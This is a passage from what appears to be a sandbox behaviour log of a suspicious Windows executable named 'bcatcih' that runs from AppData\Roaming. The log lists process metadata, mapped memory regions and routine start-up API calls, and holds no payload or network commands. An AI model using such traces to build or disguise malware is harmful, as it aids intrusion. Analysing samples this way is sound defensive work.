[334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0147.788] ResumeThread (hThread=0x114) returned 0x1 [0147.847] CloseHandle (hObject=0x114) returned 1 [0147.847] CloseHandle (hObject=0x118) returned 1 [0147.847] ExitProcess (uExitCode=0x0) [0147.847] HeapValidate (hHeap=0x2130000, dwFlags=0x0, lpMem=0x21305a8) returned 1 [0147.847] HeapFree (in: hHeap=0x2130000, dwFlags=0x0, lpMem=0x21305a8 | out: hHeap=0x2130000) returned 1 Thread: id = 126 os_tid = 0x2f4 Process: id = "6" image_name = "bcatcih" filename = "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\bcatcih" page_root = "0x712d0000" os_pid = "0x500" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x360" cmd_line = "C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fa87" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2131 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2132 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2133 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2134 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2135 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2136 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2137 start_va = 0x1b0000 end_va = 0x1b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 2138 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2139 start_va = 0x400000 end_va = 0x24affff monitored = 1 entry_point = 0x416797 region_type = mapped_file name = "bcatcih" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\bcatcih") Region: id = 2140 start_va = 0x771d0000 end_va = 0x7734afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2141 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2142 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2143 start_va = 0x7fff0000 end_va = 0x7ffa1676ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2144 start_va = 0x7ffa16770000 end_va = 0x7ffa16930fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2145 start_va = 0x7ffa16931000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffa16931000" filename = "" Region: id = 2335 start_va = 0x24b0000 end_va = 0x25bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024b0000" filename = "" Region: id = 2336 start_va = 0x640d0000 end_va = 0x6411ffff monitored = 0 entry_point = 0x640e8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2337 start_va = 0x64050000 end_va = 0x640c9fff monitored = 0 entry_point = 0x64063290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2338 start_va = 0x76720000 end_va = 0x767fffff monitored = 0 entry_point = 0x76733980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2339 start_va = 0x64120000 end_va = 0x64127fff monitored = 0 entry_point = 0x641217c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2340 start_va = 0x25c0000 end_va = 0x276ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025c0000" filename = "" Region: id = 2341 start_va = 0x76720000 end_va = 0x767fffff monitored = 0 entry_point = 0x76733980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2342 start_va = 0x76910000 end_va = 0x76a8dfff monitored = 0 entry_point = 0x769c1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2432 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2433 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2434 start_va = 0x24b0000 end_va = 0x256dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2435 start_va = 0x25b0000 end_va = 0x25bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 2436 start_va = 0x73e50000 end_va = 0x73ee1fff monitored = 0 entry_point = 0x73e90380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 2437 start_va = 0x7fb00000 end_va = 0x7fea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 2438 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2439 start_va = 0x743d0000 end_va = 0x74516fff monitored = 0 entry_point = 0x743e1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2440 start_va = 0x74ab0000 end_va = 0x74bfefff monitored = 0 entry_point = 0x74b66820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2441 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2442 start_va = 0x2770000 end_va = 0x286ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002770000" filename = "" Region: id = 2443 start_va = 0x2570000 end_va = 0x2599fff monitored = 0 entry_point = 0x2575680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2444 start_va = 0x2870000 end_va = 0x29f7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002870000" filename = "" Region: id = 2445 start_va = 0x741b0000 end_va = 0x741dafff monitored = 0 entry_point = 0x741b5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2446 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2447 start_va = 0x2570000 end_va = 0x2570fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002570000" filename = "" Region: id = 2448 start_va = 0x2a00000 end_va = 0x2b80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002a00000" filename = "" Region: id = 2449 start_va = 0x2b90000 end_va = 0x3f8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002b90000" filename = "" Region: id = 2450 start_va = 0x3f90000 end_va = 0x40cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f90000" filename = "" Region: id = 2527 start_va = 0x40d0000 end_va = 0x48cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000040d0000" filename = "" Region: id = 2532 start_va = 0x2580000 end_va = 0x2582fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002580000" filename = "" Region: id = 2533 start_va = 0x2580000 end_va = 0x2582fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002580000" filename = "" Region: id = 2534 start_va = 0x2580000 end_va = 0x2588fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002580000" filename = "" Region: id = 2535 start_va = 0x72cb0000 end_va = 0x72d24fff monitored = 0 entry_point = 0x72ce9a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2536 start_va = 0x76a90000 end_va = 0x76b4dfff monitored = 0 entry_point = 0x76ac5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2537 start_va = 0x762b0000 end_va = 0x7646cfff monitored = 0 entry_point = 0x76392a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2538 start_va = 0x76c00000 end_va = 0x76cacfff monitored = 0 entry_point = 0x76c14f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2539 start_va = 0x73f00000 end_va = 0x73f1dfff monitored = 0 entry_point = 0x73f0b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2540 start_va = 0x73ef0000 end_va = 0x73ef9fff monitored = 0 entry_point = 0x73ef2a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2541 start_va = 0x76840000 end_va = 0x76897fff monitored = 0 entry_point = 0x768825c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2542 start_va = 0x76cb0000 end_va = 0x76cf3fff monitored = 0 entry_point = 0x76cc9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2543 start_va = 0x40d0000 end_va = 0x424ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040d0000" filename = "" Region: id = 2544 start_va = 0x3f90000 end_va = 0x407ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f90000" filename = "" Region: id = 2545 start_va = 0x40c0000 end_va = 0x40cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040c0000" filename = "" Region: id = 2551 start_va = 0x764e0000 end_va = 0x765fefff monitored = 0 entry_point = 0x76525980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2552 start_va = 0x2590000 end_va = 0x2590fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 2553 start_va = 0x3f90000 end_va = 0x404bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003f90000" filename = "" Region: id = 2554 start_va = 0x4070000 end_va = 0x407ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004070000" filename = "" Region: id = 2555 start_va = 0x2590000 end_va = 0x2593fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 2556 start_va = 0x713a0000 end_va = 0x713bcfff monitored = 0 entry_point = 0x713a3b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2557 start_va = 0x25a0000 end_va = 0x25a2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025a0000" filename = "" Region: id = 2573 start_va = 0x25a0000 end_va = 0x25a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025a0000" filename = "" Thread: id = 151 os_tid = 0x4ec [0149.436] GetStartupInfoW (in: lpStartupInfo=0x19ff18 | out: lpStartupInfo=0x19ff18*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x80, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0149.436] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0149.436] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x40c0000 [0149.437] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76720000 [0149.437] GetProcAddress (hModule=0x76720000, lpProcName="FlsAlloc") returned 0x7673a980 [0149.437] GetProcAddress (hModule=0x76720000, lpProcName="FlsGetValue") returned 0x76737570 [0149.437] GetProcAddress (hModule=0x76720000, lpProcName="FlsSetValue") returned 0x76739e30 [0149.437] GetProcAddress (hModule=0x76720000, lpProcName="FlsFree") returned 0x76744ff0 [0149.439] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x214) returned 0x40c05a8 [0149.439] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76720000 [0149.439] GetCurrentThreadId () returned 0x4ec [0149.439] GetStartupInfoW (in: lpStartupInfo=0x19feb4 | out: lpStartupInfo=0x19feb4*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x80, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x41a0cd, hStdOutput=0x41a406, hStdError=0x40c05a8)) [0149.439] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x800) returned 0x40c07c8 [0149.439] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0149.439] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0149.439] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0149.439] SetHandleCount (uNumber=0x20) returned 0x20 [0149.439] GetCommandLineW () returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" [0149.439] GetEnvironmentStringsW () returned 0x2680f38* [0149.440] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x0, Size=0xa16) returned 0x40c0fd0 [0149.440] FreeEnvironmentStringsW (penv=0x2680f38) returned 1 [0149.440] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x24a6290, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\bcatcih")) returned 0x2d [0149.440] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x0, Size=0x64) returned 0x40c19f0 [0149.440] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x90) returned 0x40c1a60 [0149.440] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x3e) returned 0x40c1af8 [0149.440] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x5c) returned 0x40c1b40 [0149.440] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x6e) returned 0x40c1ba8 [0149.440] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x78) returned 0x40c1c20 [0149.440] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x62) returned 0x40c1ca0 [0149.440] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x28) returned 0x40c1d10 [0149.441] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x48) returned 0x40c1d40 [0149.441] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x1a) returned 0x40c1d90 [0149.441] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x3a) returned 0x40c1db8 [0149.441] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x62) returned 0x40c1e00 [0149.441] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x2a) returned 0x40c1e70 [0149.441] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x2e) returned 0x40c1ea8 [0149.441] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x1c) returned 0x40c1ee0 [0149.441] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0xd2) returned 0x40c1f08 [0149.441] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x7c) returned 0x40c1fe8 [0149.441] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x36) returned 0x40c2070 [0149.441] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x3a) returned 0x40c20b0 [0149.441] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x90) returned 0x40c20f8 [0149.441] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x24) returned 0x40c2190 [0149.441] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x30) returned 0x40c21c0 [0149.441] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x36) returned 0x40c21f8 [0149.441] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x48) returned 0x40c2238 [0149.441] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x52) returned 0x40c2288 [0149.441] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x3c) returned 0x40c22e8 [0149.441] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0xd2) returned 0x40c2330 [0149.441] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x2e) returned 0x40c2410 [0149.441] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x1e) returned 0x40c2448 [0149.441] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x2c) returned 0x40c2470 [0149.441] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x54) returned 0x40c24a8 [0149.441] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x52) returned 0x40c2508 [0149.441] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x24) returned 0x40c2568 [0149.441] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x42) returned 0x40c2598 [0149.441] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x2c) returned 0x40c25e8 [0149.441] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x44) returned 0x40c2620 [0149.441] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x24) returned 0x40c2670 [0149.449] HeapFree (in: hHeap=0x40c0000, dwFlags=0x0, lpMem=0x40c0fd0 | out: hHeap=0x40c0000) returned 1 [0149.451] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0149.451] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x800) returned 0x40c26a0 [0149.451] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x80) returned 0x40c2ea8 [0149.451] GetLastError () returned 0x0 [0149.451] SetLastError (dwErrCode=0x0) [0149.451] GetLastError () returned 0x0 [0149.452] SetLastError (dwErrCode=0x0) [0149.452] GetLastError () returned 0x0 [0149.452] SetLastError (dwErrCode=0x0) [0149.452] GetACP () returned 0x4e4 [0149.452] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x0, Size=0x220) returned 0x40c0fd0 [0149.452] GetLastError () returned 0x0 [0149.452] SetLastError (dwErrCode=0x0) [0149.452] IsValidCodePage (CodePage=0x4e4) returned 1 [0149.452] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19fe7c | out: lpCPInfo=0x19fe7c) returned 1 [0149.452] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19f948 | out: lpCPInfo=0x19f948) returned 1 [0149.452] GetLastError () returned 0x0 [0149.452] SetLastError (dwErrCode=0x0) [0149.452] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0149.452] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x19f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿAĀ") returned 256 [0149.452] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿAĀ", cchSrc=256, lpCharType=0x19f95c | out: lpCharType=0x19f95c) returned 1 [0149.452] GetLastError () returned 0x0 [0149.452] SetLastError (dwErrCode=0x0) [0149.452] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0149.452] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x19f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0149.452] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ 